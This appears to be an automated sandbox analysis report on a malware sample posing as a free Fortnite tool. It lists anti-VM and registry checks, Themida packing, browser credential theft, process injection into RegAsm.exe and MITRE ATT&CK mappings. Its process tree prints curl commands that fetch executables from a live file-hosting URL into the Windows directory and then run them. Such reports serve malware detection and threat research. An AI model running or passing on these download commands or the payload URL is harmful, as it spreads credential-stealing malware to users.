cdc538c211494d264a6f1fb268a7058e1493baec68b2d34476fc0a300a60ebd7

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Free Fortnite [ Astro Services ].exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Free Fortnite [ Astro Services ].exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Free Fortnite [ Astro Services ].exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4204450073-1267028356-951339405-1000\Control Panel\International\Geo\Nation	Free Fortnite [ Astro Services ].exe

Executes dropped EXE 1 IoCs

pid	Process
4132	physmeme.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 5 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/memory/2324-0-0x0000000140000000-0x0000000140C38000-memory.dmp	themida
behavioral1/memory/2324-2-0x0000000140000000-0x0000000140C38000-memory.dmp	themida
behavioral1/memory/2324-1-0x0000000140000000-0x0000000140C38000-memory.dmp	themida
behavioral1/memory/2324-3-0x0000000140000000-0x0000000140C38000-memory.dmp	themida
behavioral1/memory/2324-25-0x0000000140000000-0x0000000140C38000-memory.dmp	themida

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Free Fortnite [ Astro Services ].exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2324	Free Fortnite [ Astro Services ].exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4132 set thread context of 1996	4132	physmeme.exe	96

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Speech\physmeme.exe	curl.exe
File created	C:\Windows\Speech\Update.exe	curl.exe
File created	C:\Windows\rescache\_merged\2229298842\3143283651.pri	LogonUI.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4412	4132	WerFault.exe	92

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "120"	LogonUI.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1996	RegAsm.exe
1996	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	1996	RegAsm.exe
Token: SeBackupPrivilege	1996	RegAsm.exe
Token: SeSecurityPrivilege	1996	RegAsm.exe
Token: SeSecurityPrivilege	1996	RegAsm.exe
Token: SeSecurityPrivilege	1996	RegAsm.exe
Token: SeSecurityPrivilege	1996	RegAsm.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2368	LogonUI.exe
2368	LogonUI.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 2324 wrote to memory of 4804	2324	Free Fortnite [ Astro Services ].exe	85
PID 2324 wrote to memory of 4804	2324	Free Fortnite [ Astro Services ].exe	85
PID 2324 wrote to memory of 116	2324	Free Fortnite [ Astro Services ].exe	86
PID 2324 wrote to memory of 116	2324	Free Fortnite [ Astro Services ].exe	86
PID 116 wrote to memory of 4076	116	cmd.exe	87
PID 116 wrote to memory of 4076	116	cmd.exe	87
PID 116 wrote to memory of 4792	116	cmd.exe	88
PID 116 wrote to memory of 4792	116	cmd.exe	88
PID 116 wrote to memory of 392	116	cmd.exe	89
PID 116 wrote to memory of 392	116	cmd.exe	89
PID 4804 wrote to memory of 3916	4804	cmd.exe	91
PID 4804 wrote to memory of 3916	4804	cmd.exe	91
PID 2324 wrote to memory of 4132	2324	Free Fortnite [ Astro Services ].exe	92
PID 2324 wrote to memory of 4132	2324	Free Fortnite [ Astro Services ].exe	92
PID 2324 wrote to memory of 4132	2324	Free Fortnite [ Astro Services ].exe	92
PID 2324 wrote to memory of 428	2324	Free Fortnite [ Astro Services ].exe	93
PID 2324 wrote to memory of 428	2324	Free Fortnite [ Astro Services ].exe	93
PID 428 wrote to memory of 2920	428	cmd.exe	95
PID 428 wrote to memory of 2920	428	cmd.exe	95
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96
PID 4132 wrote to memory of 1996	4132	physmeme.exe	96

C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe
"C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:2324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.exe --output C:\Windows\Speech\physmeme.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4804
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/crypted.exe --output C:\Windows\Speech\physmeme.exe
    3⤵
    - Drops file in Windows directory
    PID:3916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:116
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\Free Fortnite [ Astro Services ].exe" MD5
    3⤵
    PID:4076
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:4792
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:392
- C:\Windows\Speech\physmeme.exe
  "C:\Windows\Speech\physmeme.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4132
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1996
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 276
    3⤵
    - Program crash
    PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.exe --output C:\Windows\Speech\Update.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:428
- - C:\Windows\system32\curl.exe
    curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/Update.exe --output C:\Windows\Speech\Update.exe
    3⤵
    - Drops file in Windows directory
    PID:2920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4132 -ip 4132
1⤵
PID:2448

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3956055 /state1:0x41c64e6d
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:2368

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

4

System Information Discovery

4

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System